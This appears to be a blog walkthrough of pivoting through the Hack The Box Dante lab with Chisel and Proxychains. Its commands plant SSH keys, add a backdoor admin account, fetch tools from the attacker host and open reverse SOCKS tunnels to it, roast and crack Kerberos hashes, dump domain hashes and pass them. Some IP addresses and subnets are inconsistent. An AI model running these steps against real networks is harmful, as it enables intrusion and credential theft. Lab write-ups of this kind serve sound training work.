Chisel is a fast TCP/UDP tunnel, transported over HTTP, and secured via SSH. It uses a single executable for establishing connections as the client or server. Chisel is written in Go (golang). It is mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into any network.

Proxychains is a UNIX program, that hooks network-related libc functions in dynamically linked programs via a preloaded DLL (dlsym(), LD_PRELOAD) and redirects the connections through SOCKS4a/5 or HTTP proxies. It supports TCP only (no UDP/ICMP etc).

Recently I’ve completed the Hack The Box Dante Pro Labs and really enjoyed it. One of the most crucial pieces to being successful in the lab is understanding how to pivot properly. So I wanted to write up a blog post explaining how to properly pivot.

Chisel is an amazing tool and the gracious creators have created releases for every major version that can be downloaded and used immediately. The tool can also be installed using these following commands:

## Install Go
└─$ sudo apt-get install golang 


### Setup Chisel locally on attacker machine
└─$ sudo git clone https://github.com/jpillora/chisel.git /opt/chisel
└─$ cd /opt/chisel

### Create Windows 64-bit architecture executable file
└─$ sudo GOOS=windows GOARCH=amd64 go build -ldflags="-s -w" .

### Create Windows 32-bit architecture executable file
└─$ sudo GOOS=windows GOARCH=386 go build -ldflags="-s -w" .

# MacOS 64-bit
GOOS=darwin GOARCH=amd64 go build -ldflags="-s -w" .

# MacOS 32-bit
GOOS=darwin GOARCH=386 go build -ldflags="-s -w" .

# Linux 64-bit
GOOS=linux GOARCH=amd64 go build -ldflags="-s -w" .

# Linux 32-bit
GOOS=linux GOARCH=386 go build -ldflags="-s -w" .
Releases · jpillora/chisel
A fast TCP/UDP tunnel over HTTP. Contribute to jpillora/chisel development by creating an account on GitHub.

Network

Here is a network diagram to help visualize what the Attacker's movements will be as they pivot between the networks to reach every machine.

Dante Network Diagram

We are the Attacker and have found a Web Server that is open on the internet. Our Attacker machine is 10.10.14.20 and the Web Server that is internet facing at 10.10.110.100 could be the starting point used to get onto the Admin Network.

We have gained a foothold through a vulnerability found on the Web Server. We then escalate to gain root/admin on the web server. The Web Server happens to be installed on a Linux machine and we have appended our Attacker machine's SSH keys  to achieve persistence.

# pwd
/root/.ssh

# ls -lah
ls -lah
total 24K
drwx------ 2 root root 4.0K Aug 15  2018 .
drwx------ 6 root root 4.0K Sep 23 17:49 ..
-rw------- 1 root root  393 Apr 20  2018 authorized_keys
-rw------- 1 root root 1.7K Apr 20  2018 id_rsa
-rw-r--r-- 1 root root  393 Apr 20  2018 id_rsa.pub
-rw-r--r-- 1 root root  222 Aug 15  2018 known_hosts

<<--  Added id_rsa.pub to ~/.ssh/authorized_keys
# cat your_key >> ~/.ssh/authorized_keys

# cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EKxkeF6t9Uo8zwn+O/p root@syslog
ssh-rsa AAAAB3NzaC1AWFWAf6bX6HCKxscFG1qc= kali@kali

Now we begin recon on the internal network. There are a ton of ways to go about doing this. The easiest way is to transfer a tool such as nMap directly onto the Web Server machine and scan the internal network. Another way is to use a dynamic SSH tunnel utilizing SOCKS4 and use nMap with Proxychains to yield results, but this is slow. If you have access to Cobalt Strike then you can also use a beacon to setup proxy to pivot through that too. But the main focus of this post is to understand how to properly pivot without those other methods and use Chisel instead.

First we need to start a Chisel server running on port 8001 on our attacker machine so we can pivot through the 10.10.110.100/172.16.1.100 [external/internal IP address] machine and gain access to the Office Network. Run the following command to start a server:

### Open local attacker machine 
### 10.10.14.20

┌──(kali㉿kali)-[~/Downloads]
└─$ sudo ./chisel_1.7.7_linux_amd64 server -p 8001 --reverse
[sudo] password for kali: 
2022/09/04 15:12:34 server: Reverse tunnelling enabled
2022/09/04 15:12:34 server: Fingerprint 3SwItiHt3ZYqnmnGzIo17qlM/cO+02ZPHoJddb21ACk=
2022/09/04 15:12:34 server: Listening on http://0.0.0.0:8001



#### <<<----------- This comes after the Web Server connects
#### <<<----------- to the local attacker machine
2022/09/04 15:17:42 server: session#4: tun: proxy#R:127.0.0.1:1080=>socks: Listening

Using the foothold on the Web Server, we transfer Chisel to the machine and connect back to our Chisel server to complete the tunnel.

# Transfer Chisel, moving chisel over first
└─$ scp chisel_1.7.7_linux_amd64 root@10.10.110.100:.

# Then connect Web Server to Attacker with Chisel 
└─$ ssh root@10.10.110.123
root@NIX01:~# ./chisel_1.7.7_linux_amd64 client 10.10.14.20:8001 R:1080:socks

Now the Proxychains settings need to be updated on the Attacker machine to utilize this new network access using Chisel.

# Update proxychains config using your favorite text editor
└─$ sudo vi /etc/proxychains4.conf

# Add this following line at the bottom
socks5   127.0.0.1   1080

Office Network

Congrats! We now have access to the internal Office Network 172.19.1.0/24. After repeating several more phases of recon, exploitation, and privilege escalation, we have found a machine that has access to the Admin Network. The Office Domain Controller in the 172.19.1.0/24 network has access to a machine on the Admin Network 172.19.2.0/24. We will now use Chisel to build a tunnel between the Web Server and the Domain Controller.

### Open Web Server machine 
└─$ ssh root@10.10.110.100     
root@DANTE-WEB-NIX01:~# ./chisel_1.7.7_linux_amd64 server -p 8002 --reverse
2022/09/04 12:23:56 server: Reverse tunnelling enabled
2022/09/04 12:23:56 server: Fingerprint sVLqwWRIhrXeM1h6RYkiUJ10JmZCfzSO1Uo41FHVfs0=
2022/09/04 12:23:56 server: Listening on http://0.0.0.0:8002
2022/09/04 12:50:04 server: session#1: Client version (0.0.0-src) differs from server version (1.7.7)

### <<<------------ This comes after the office Domain Controller  
### <<<------------ connects to the Web Server.
2022/09/04 12:50:04 server: session#1: tun: proxy#R:127.0.0.1:2080=>socks: Listening

We use the Office Domain Controller to create a new user, haxor, in the Admin group with Remote Desktop access.

### Connect the Office Domain Controller to the Web Server
###   172.16.1.20   <---- internal for the Office Domain Controller
###   172.16.1.100  <---- internal for the Web Server
### Create a new user and give them Admin control  
### ADD NEW USER TO RDP & ADMIN GROUP 
### Using PowerShell or CMD Prompt

net user haxor Pa$$W0rd /add
net localgroup "remote desktop users" /add "domain\haxor"
net localgroup Administrators domain\haxor /add

We could also use a tool like Meterpreter to download the Chisel file onto the Office Domain Controller or download it from within a PowerShell session off our Attacker Machine.

### Back on local Attacker Machine
### Build a temporary Web Server to host the Chisel file
┌──(kali㉿kali)-[~]
└─$ sudo python3 -m http.server 443

### Within PowerShell on the Office Domain Controller machine
Invoke-WebRequest -URI https://10.10.14.20/chisel_1.7.7_windows_amd64 -OutFile chisel.exe

We can now SSH to the Office Domain Controller and start the new Chisel tunnel from there to the Web Server

### SSH to Web Server target
└─$ proxychains ssh haxor@172.16.1.20   
chisel.exe client 172.16.1.100:8002 R:2080:socks

We update the Proxychains settings on the local Attacker machine to utilize the new tunnel.

### Update the Proxychains config
$ sudo nano /etc/proxycahins4.conf

# Add the new line for 2080
socks5   127.0.0.1   1080
socks5   127.0.0.1   2080

Admin Network

The Attacker machine can now reach the Admin Domain Controller 172.19.2.5 in the Admin Network 172.19.2.0/24. We must elevate to root/admin to reach and enumerate the other machines on the Admin Network.

We try asreproating against all known users from a leaked file with Impacket's GetNPUsers.py or using kerbrute.

proxychains GetNPUsers.py dante.admin/ -no-pass -usersfile /root/ctf/htb/dante/172.16.1.20-DC01/DA_users -dc-ip 172.16.2.5

We now have a hash for the jbercov user in the dante.admin domain for the Admin Network.

Crack the hashed password using john with rockyou.txt and we have the password of myspace7

Cracking Passwords using John The Ripper
John the Ripper is a password-cracking tool that can crack hundreds of hashes,ciphers, and even password-protected files.If you are a pen-tester, cracking passwords is something you will be doing on adaily basis. This can include login passwords, file passwords, and almostanything that is protec…

The new credentials can be used for authentication with the winrm service through the crackmapexec or evil-winrm tool.

┌──(kali㉿kali)-[~]
└─$ proxychains python3 crackmapexec winrm 172.16.2.5 -u jbercov -p 'myspace7'


┌──(kali㉿kali)-[~/Downloads]
└─$ crackmapexec winrm 127.0.0.1 -u jbercov -p 'myspace7' 
SMB         127.0.0.1       5985   NONE             [*] None (name:127.0.0.1) (domain:None)
HTTP        127.0.0.1       5985   NONE             [*] http://127.0.0.1:5985/wsman
WINRM       127.0.0.1       5985   NONE             [+] None\jbercov:myspace7 (Pwn3d!)
WINRM       127.0.0.1       5985   NONE             [-] None\jbercov:myspace7 "'NoneType' object has no attribute 'upper'"

┌──(kali㉿kali)-[~/Downloads]
└─$ evil-winrm -i 127.0.0.1 -u jbercov -p myspace7

We can now grab the hash for the Administrator account.

┌──(kali㉿kali)-[~]
└─$ sudo proxychains ./secretsdump.py dante.admin/jbercov:'myspace7'@172.16.2.5 -dc-ip 172.16.2.5    
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[proxychains] Dynamic chain  ...  127.0.0.1:1080  ...  127.0.0.1:2080  ...  172.16.2.5:445  ...  OK
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[proxychains] Dynamic chain  ...  127.0.0.1:1080  ...  127.0.0.1:2080  ...  172.16.2.5:135  ...  OK
[proxychains] Dynamic chain  ...  127.0.0.1:1080  ...  127.0.0.1:2080  ...  172.16.2.5:49668  ...  OK
Administrator:500:aad3b435b51404eeaad3b435b51404ee:4c827b7074e99eefd49d05872185f7f8:::
DANTE.ADMIN\jbercov:1106:aad3b435b51404eeaad3b435b51404ee:2747def689b576780fe2339fd596688c:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:0652a9eb0b8463a8ca287fc5d099076fbbd5f1d4bc0b94466ccbcc5c4a186095
Administrator:aes128-cts-hmac-sha1-96:08f140624c46af979044dde5fff44cfd
Administrator:des-cbc-md5:8ac752cea84f4a10
DANTE.ADMIN\jbercov:aes256-cts-hmac-sha1-96:5b4b2e67112ac898f13fc8b686c07a43655c5b88c9ba7e5b48b1383bc5b3a3b6
DANTE.ADMIN\jbercov:aes128-cts-hmac-sha1-96:489ca03ed99b1cb73e7a28c242328d0d
DANTE.ADMIN\jbercov:des-cbc-md5:c7e08938cb7f929d
[*] Cleaning up... 

We pass this hash to start a PowerShell session with the Admin Domain Controller.

┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ proxychains evil-winrm -i 172.16.2.5 -u administrator -H 4c827b7074e99eefd49d05872185f7f8

*Evil-WinRM* PS C:\Users\Administrator\Documents> upload chisel_1.7.7_windows_amd64

We go back to the Office Domain Controller with its respective admin account, haxor, that weas created earlier. We use Chisel to begin building the new tunnel.

### Open Office Domain Controller machine 
└─$ proxychainsssh haxor@172.16.1.20   
 chisel.exe -p 8003 --reverse
2022/09/04 12:23:56 server: Reverse tunnelling enabled
2022/09/04 12:23:56 server: Fingerprint sVLqwWRIhrXeM1h6RYkiUJ10JmZCfzSO1Uo41FHVfs0=
2022/09/04 12:23:56 server: Listening on http://0.0.0.0:8003
2022/09/04 12:50:04 server: session#1: Client version (0.0.0-src) differs from server version (1.7.7)

<<<------------ This comes after the Domain Controller connects to the Web Server
2022/09/04 12:50:04 server: session#1: tun: proxy#R:127.0.0.1:3080=>socks: Listening

We will now SSH to the Admin Domain Controller passing the hash for the administrator account. We will then move Chisel onto the machine and connect the tunnel from the Admin Domain Controller to the Office Domain Controller.

### Build a tunnel between the Domain Controllers
###   172.16.1.20  <---- Office Domain Controller
###   172.16.2.5   <---- Admin Domain Controller
└─$ proxychains evil-winrm -i 172.16.2.5 -u administrator -H 4c827b7074e99eefd49d05872185f7f8

###  using evil-winrm uploaded chisel file
*Evil-WinRM* PS C:\Users\Administrator\Documents> upload chisel_1.7.7_windows_amd64

### note this needed to be ran in PowerShell
*Evil-WinRM* PS C:\Users\Administrator\Documents> Start-Process -NoNewWindow -FilePath "chisel.exe" -ArgumentList “client 172.16.1.20:8003 R:3080:socks”

We need to update the Proxychains configuration on the local Attacker machine for the third and last tunnel.

### Update Proxychains config
sudo nano /etc/proxycahins4.conf

### Add the third new tunnel path
socks5   127.0.0.1   1080
socks5   127.0.0.1   2080
socks5   127.0.0.1   3080

Now the Attacker can hit the final targets on the Admin Network 172.19.2.0/24.

The Attacker starts on their local machine from 10.10.14.20. We open port 8001 to use for the first tunnel routing to port 1080 for the Web Server with a respective internal/external IP address of 172.16.1.100/10.10.110.100. The Web Server is on the Office Network 172.16.1.0/24.

We pivot through the Web Server to reach the Office Domain Controller 172.16.1.20 on the Office Network 172.16.1.0/24. We build a second tunnel from port 8002 of the Web Server to port 2080 of the Office Domain Controller.

The Domain Controller 172.16.1.20 is able to reach the Admin Domain Controller 172.16.2.5 on the Admin Network 172.16.1.0/24. To reach the final targets on the Admin Network, we need to build the last tunnel from port 8003 of the Office Domain Controller to port 3080 of the Admin Domain Controller.

The malicious user can use all tools locally on the Attacker machine against any target in the Admin or Office Network.

proxychains nmap 172.16.2.101